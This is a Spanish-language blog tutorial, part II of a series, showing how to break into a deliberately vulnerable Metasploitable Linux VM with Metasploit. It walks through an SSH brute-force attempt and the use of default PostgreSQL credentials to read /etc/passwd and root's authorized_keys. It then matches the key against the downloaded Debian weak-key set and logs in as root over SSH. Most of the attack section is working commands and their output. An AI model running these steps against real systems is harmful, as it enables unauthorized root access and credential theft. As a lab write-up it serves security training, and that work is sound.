Inicio > Hacking, MetaSploit > Penetrando Sistemas bajo plataforma GNU/Linux (vulnerable) con MetaSploit FrameWork – Parte II

Penetrando Sistemas bajo plataforma GNU/Linux (vulnerable) con MetaSploit FrameWork – Parte II

CONCEPTOS BASICOS DE PENETRACION BAJO PLATAFORMA GNU/LINUX(VULNERABLE) USANDO METASPLOIT FRAMEWORK – PARTE II
Atacando un servicio SSH Vulnerable

Encontrando Vulnerabilidades sobre el servicio SSH (Puerto 22)

Tomando como insumo, las credenciales para acceso a las bases de datos postgresql y mysql anteriormente identificados en la entrada anterior, se puede ejecutar consultas SQL “maliciosas” que obtengan información sensible almacenada en la maquina, como por ejemplo ficheros de configuración, información de programas instalados y/o ficheros de claves.

En este caso, es posible obtener la clave RSA almacenada en el servidor y posteriormente utilizarla para obtener acceso a la maquina por medio de SSH, este es un vector de ataque valido para comprometer un servicio SSH desactualizado. Una de las habilidades que debe desarrollar un buen hacker/pentester es la capacidad de conseguir vectores de ataque indirectos contra sistemas a los que es difícil atacar de forma directa, (como en este caso). Por otro lado, si el lector no conoce detalles sobre SSH en próximas entradas se hablará sobre el tema a un nivel intermedio/avanzado.

Aunque este será el vector de ataque que se va a emplear para comprometer el servicio SSH, también se indican algunos otros módulos existentes en MetaSploit para tratar con servicios SSH.

msf > search ssh
[*] Searching loaded modules for pattern ‘ssh’…
Auxiliary=========Name Disclosure Date Rank Description—- ————— —- ———–fuzzers/ssh/ssh_kexinit_corrupt normal SSH Key Exchange Init Corruption

fuzzers/ssh/ssh_version_15 normal SSH 1.5 Version Fuzzer

fuzzers/ssh/ssh_version_2 normal SSH 2.0 Version Fuzzer

fuzzers/ssh/ssh_version_corrupt normal SSH Version Corruption

scanner/ssh/ssh_login normal SSH Login Check Scanner

scanner/ssh/ssh_login_pubkey normal SSH Public Key Login Scanner

scanner/ssh/ssh_version normal SSH Version Scanner

Exploits

========

Name Disclosure Date Rank Description

—- ————— —- ———–

windows/ssh/freeftpd_key_exchange 2006-05-12 average FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow

windows/ssh/freesshd_key_exchange 2006-05-12 average FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow

windows/ssh/putty_msg_debug 2002-12-16 normal PuTTy.exe <= v0.53 Buffer Overflow

windows/ssh/securecrt_ssh1 2002-07-23 average SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow

Existen unos cuantos módulos que pueden ser útiles para obtener información sobre la maquina objetivo y/o realizar ataques de fuerza bruta.

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description

—- ————— ——– ———–

BLANK_PASSWORDS true no Try blank passwords for all users

BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5

PASSWORD no A specific password to authenticate with

PASS_FILE no File containing passwords, one per line

RHOSTS yes The target address range or CIDR identifier

RPORT 22 yes The target port

STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host

THREADS 1 yes The number of concurrent threads

USERNAME root no A specific username to authenticate as

USERPASS_FILE no File containing users and passwords separated by space, one pair per line

USER_AS_PASS true no Try the username as the password for all users

USER_FILE no File containing usernames, one per line

VERBOSE true yes Whether to print output for all attempts

msf auxiliary(ssh_login) > set RHOSTS 192.168.1.34

RHOSTS => 192.168.1.34

msf auxiliary(ssh_login) > set BRUTEFORCE_SPEED 2

BRUTEFORCE_SPEED => 2

msf auxiliary(ssh_login) > set USERPASS_FILE /home/adastra/UTILITIES/userlist.lst

USERPASS_FILE => /home/adastra/UTILITIES/userlist.lst

msf auxiliary(ssh_login) > set PASS_FILE /home/adastra/UTILITIES/passwordSimple.lst

PASS_FILE => /home/adastra/UTILITIES/passwordSimple.lst

msf auxiliary(ssh_login) > set PASS_FILE /home/adastra/UTILITIES/userPass.lst

PASS_FILE => /home/adastra/UTILITIES/userPass.lst

msf auxiliary(ssh_login) > run

[*] 192.168.1.34:22 – SSH – Trying: username: ‘root’ with password: ”

[-] 192.168.1.34:22 – SSH – Failed: ‘root’:”

[*] 192.168.1.34:22 – SSH – Trying: username: ‘admin’ with password: ”

[-] 192.168.1.34:22 – SSH – Failed: ‘admin’:”

…………………

[-] 192.168.1.34:22 – SSH – Failed: ‘root’:’1234′

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

El ataque por fuerza bruta no ha funcionado, debido a una de dos razones, la clave es fuerte o el diccionario utilizado es muy pobre, en cualquier caso, los ataques de fuerza bruta contra servicios SSH son especialmente peligrosos, dado que muchos servicios están configurados de forma tal, que después de una cantidad determinada de intentos, la dirección desde donde se realizan dichas peticiones es “marcada” en una blacklist que rechaza directamente todas las peticiones que provienen desde las direcciones almacenadas en dicha lista, por este motivo, una vez más se recomienda que para este tipo de operaciones se utilice THC Hydra.

Ahora, como ya se ha comentado, se procede a comprometer el servicio SSH, los pasos ha seguir son los siguientes:

  1. Por medio de PostgreSQL leer el fichero /etc/passwd, para hacer esto, existen dos opciones realizar una conexión de forma manual a la base de datos o utilizar el modulo posgresql_readfile, a continuación se detallan ambos procedimientos.
    msf > use auxiliary/admin/postgres/postgres_readfile
    msf auxiliary(postgres_readfile) > show options
    Module options (auxiliary/admin/postgres/postgres_readfile):
    Name Current Setting Required Description
    —- ————— ——– ———–
    DATABASE template1 yes The database to authenticate againstPASSWORD no The password for the specified username. Leave blank for a random password.

    RFILE /etc/passwd yes The remote file

    RHOST yes The target address

    RPORT 5432 yes The target port

    USERNAME postgres yes The username to authenticate as

    VERBOSE false no Enable verbose output

    msf auxiliary(postgres_readfile) > set PASSWORD postgres

    PASSWORD => postgres

    msf auxiliary(postgres_readfile) > set RHOST 192.168.1.34

    RHOST => 192.168.1.34

    msf auxiliary(postgres_readfile) > run

    Query Text: ‘CREATE TEMP TABLE AgyFhQKKRZ (INPUT TEXT);

    COPY AgyFhQKKRZ FROM ‘/etc/passwd’;

    SELECT * FROM AgyFhQKKRZ’

    ===========================================================================================================================

    input

    —–

    root:x:0:0:root:/root:/bin/bash

    daemon:x:1:1:daemon:/usr/sbin:/bin/sh

    bin:x:2:2:bin:/bin:/bin/sh

    sys:x:3:3:sys:/dev:/bin/sh

    sync:x:4:65534:sync:/bin:/bin/sync

    games:x:5:60:games:/usr/games:/bin/sh

    man:x:6:12:man:/var/cache/man:/bin/sh

    lp:x:7:7:lp:/var/spool/lpd:/bin/sh

    mail:x:8:8:mail:/var/mail:/bin/sh

    news:x:9:9:news:/var/spool/news:/bin/sh

    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh

    proxy:x:13:13:proxy:/bin:/bin/sh

    www-data:x:33:33:www-data:/var/www:/bin/sh

    backup:x:34:34:backup:/var/backups:/bin/sh

    list:x:38:38:Mailing List Manager:/var/list:/bin/sh

    irc:x:39:39:ircd:/var/run/ircd:/bin/sh

    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh

    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

    libuuid:x:100:101::/var/lib/libuuid:/bin/sh

    dhcp:x:101:102::/nonexistent:/bin/false

    syslog:x:102:103::/home/syslog:/bin/false

    klog:x:103:104::/home/klog:/bin/false

    sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin

    msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash

    bind:x:105:113::/var/cache/bind:/bin/false

    postfix:x:106:115::/var/spool/postfix:/bin/false

    ftp:x:107:65534::/home/ftp:/bin/false

    postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

    mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false

    tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false

    distccd:x:111:65534::/:/bin/false

    user:x:1001:1001:just a user,111,,:/home/user:/bin/bash

    service:x:1002:1002:,,,:/home/service:/bin/bash

    telnetd:x:112:120::/nonexistent:/bin/false

    proftpd:x:113:65534::/var/run/proftpd:/bin/false

    [*] Auxiliary module execution completed

    Como se puede apreciar, con este modulo y evidentemente conociendo las credenciales de acceso a la base de datos, es posible obtener información sensible del sistema, en este caso se ha conseguido la información de los usuarios/grupos existentes en la maquina objetivo, por otro lado para realizar una conexión manualmente a la base de datos:

    msf > psql -h 192.168.1.34 -U postgres -W
    [*] exec: psql -h 192.168.1.34 -U postgres -W
    Password for user postgres:
    create table users_system (input TEXT); copy users_system from ‘/etc/passwd’; select input from users_system; CREATE TABLE COPY 35 input——————————————————————————

    root:x:0:0:root:/root:/bin/bash

    daemon:x:1:1:daemon:/usr/sbin:/bin/sh

    bin:x:2:2:bin:/bin:/bin/sh

    sys:x:3:3:sys:/dev:/bin/sh

    sync:x:4:65534:sync:/bin:/bin/sync

    games:x:5:60:games:/usr/games:/bin/sh

    man:x:6:12:man:/var/cache/man:/bin/sh

    lp:x:7:7:lp:/var/spool/lpd:/bin/sh

    mail:x:8:8:mail:/var/mail:/bin/sh

    news:x:9:9:news:/var/spool/news:/bin/sh

    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh

    proxy:x:13:13:proxy:/bin:/bin/sh

    www-data:x:33:33:www-data:/var/www:/bin/sh

    backup:x:34:34:backup:/var/backups:/bin/sh

    list:x:38:38:Mailing List Manager:/var/list:/bin/sh

    irc:x:39:39:ircd:/var/run/ircd:/bin/sh

    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh

    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

    libuuid:x:100:101::/var/lib/libuuid:/bin/sh

    dhcp:x:101:102::/nonexistent:/bin/false

    syslog:x:102:103::/home/syslog:/bin/false

    klog:x:103:104::/home/klog:/bin/false

    sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin

    msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash

    bind:x:105:113::/var/cache/bind:/bin/false

    postfix:x:106:115::/var/spool/postfix:/bin/false

    ftp:x:107:65534::/home/ftp:/bin/false

    postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

    mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false

    tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false

    distccd:x:111:65534::/:/bin/false

    user:x:1001:1001:just a user,111,,:/home/user:/bin/bash

    service:x:1002:1002:,,,:/home/service:/bin/bash

    telnetd:x:112:120::/nonexistent:/bin/false

    proftpd:x:113:65534::/var/run/proftpd:/bin/false

    (35 rows)

    Independiente del mecanismo, el resultado es el mismo, de hecho realizar la conexión a la base de datos y copiar los datos del fichero /etc/passwd en una tabla, es justo lo que hace el modulo postgres_readfile

  2. La información anteriormente obtenida, ha arrojado un resultado interesante, se trata de los puntos de montaje o directorios raíz de cada una de las cuentas de usuario así como la(s) shell(s) que soporta, ahora solamente basta consultar el directorio raíz del usuario “root” para averiguar si existe el directorio <ROOT_DIR>/.ssh/authorized_keys/ que es creado automáticamente por SSH para almacenar las claves correspondientes a las conexiones realizadas. El mecanismo es el mismo que el anteriormente descrito para obtener el fichero /etc/passwd.
    msf > use auxiliary/admin/postgres/postgres_readfile
    msf auxiliary(postgres_readfile) > show options
    Module options (auxiliary/admin/postgres/postgres_readfile):
    Name Current Setting Required Description
    —- ————— ——– ———–
    DATABASE template1 yes The database to authenticate againstPASSWORD postgres no The password for the specified username. Leave blank for a random password.

    RFILE /etc/passwd yes The remote file

    RHOST 192.168.1.34 yes The target address

    RPORT 5432 yes The target port

    USERNAME postgres yes The username to authenticate as

    VERBOSE false no Enable verbose output

    msf auxiliary(postgres_readfile) > set RFILE ‘/root/.ssh/authorized_keys’

    RFILE => /root/.ssh/authorized_keys

    msf auxiliary(postgres_readfile) > run

    Query Text: ‘CREATE TEMP TABLE KmDNRoKcC (INPUT TEXT);

    COPY KmDNRoKcC FROM ‘/root/.ssh/authorized_keys’;

    SELECT * FROM KmDNRoKcC’

    =======================================================================================================================================

    input

    —–

    ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

    [*] Auxiliary module execution completed

    Como puede apreciarse, se ha podido obtener una clave RSA almacenada en el directorio raíz del usuario “root”

  3. Ahora la pregunta lógica será, que se puede hacer con esta clave en este formato? En el sitio http://www.exploits-db.com existe una gran cantidad de claves RSA disponibles, aprovechando una vulnerabilidad conocida del servicio SSH con OpenSSL en distribuciones basadas en Debian que consiste en la “predicibilidad” de la clave RSA generada. Para ver los detalles de esta vulnerabilidad: http://www.exploit-db.com/exploits/5622/
    A continuación se procede a seguir los siguientes pasos:

    >wget http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
    –2011-05-16 22:56:13– http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
    Resolving http://www.exploit-db.com&#8230; 174.129.211.218
    Connecting to http://www.exploit-db.com|174.129.211.218|:80…
    connected.HTTP request sent, awaiting response… 200 OKLength: 50226987 (48M) [application/x-bzip2]

    Saving to: `debian_ssh_rsa_2048_x86.tar.bz2′

    100%[==============================================================================================================================>] 50,226,987 1.01M/s in 81s

    2011-05-16 22:57:35 (603 KB/s) – `debian_ssh_rsa_2048_x86.tar.bz2′ saved [50226987/50226987]

    > tar jxvf debian_ssh_rsa_2048_x86.tar.bz2

    …………

    > cd rsa/2048

    > grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub

    57c3115d77c56390332dc5c49978627a-5429.pub

La clave se encuentra almacenada en el repositorio de claves, ahora es posible utilizarla para realizar una conexión SSH, normalmente especificando dicha clave con la opción -i:

> ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.34 -p 22
The authenticity of host ‘192.168.1.34 (192.168.1.34)’ can’t be established.RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.Are you sure you want to continue connecting (yes/no)? yesWarning: Permanently added ‘192.168.1.34’ (RSA) to the list of known hosts.Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

You have mail.

root@metasploitable:~# whoami

root

Nota: En el caso de que la clave RSA no pueda ser localizada se puede buscar alguna otra vulnerabilidad en www.exploit-db.com e intentar aplicarla, por otro lado, si por alguna razón la conexión es rechazada con el siguiente mensaje de error:

>ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.34 -p 22
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!Someone could be eavesdropping on you right now (man-in-the-middle attack)!

It is also possible that the RSA host key has just been changed.

The fingerprint for the RSA key sent by the remote host is

56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.

Please contact your system administrator.

Add correct host key in /root/.ssh/known_hosts to get rid of this message.

Offending key in /root/.ssh/known_hosts:5

RSA host key for 192.168.1.34 has changed and you have requested strict checking.

Host key verification failed.

Es debido a que probablemente, la dirección IP de la víctima se ha registrado anteriormente en el directorio raíz de la maquina del atacante asociándose con otra maquina y otra clave RSA, esto es bastante común en entornos de pruebas, especialmente cuando el router asigna dinamicamente direcciones IP a cada una de las maquinas conectadas (servidor DHCP activo), para evitar esto, simplemente es necesario limpiar dicha dirección IP del listado de hosts conocidos utilizando el siguiente comando

>ssh-keygen -R 192.168.1.34/root/.ssh/known_hosts

updated.Original contents retained as /root/.ssh/known_hosts.old

Después de ejecutar eso, será posible realizar una conexión de forma normal con SSH.

  1. Aún no hay comentarios.
  1. No trackbacks yet.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: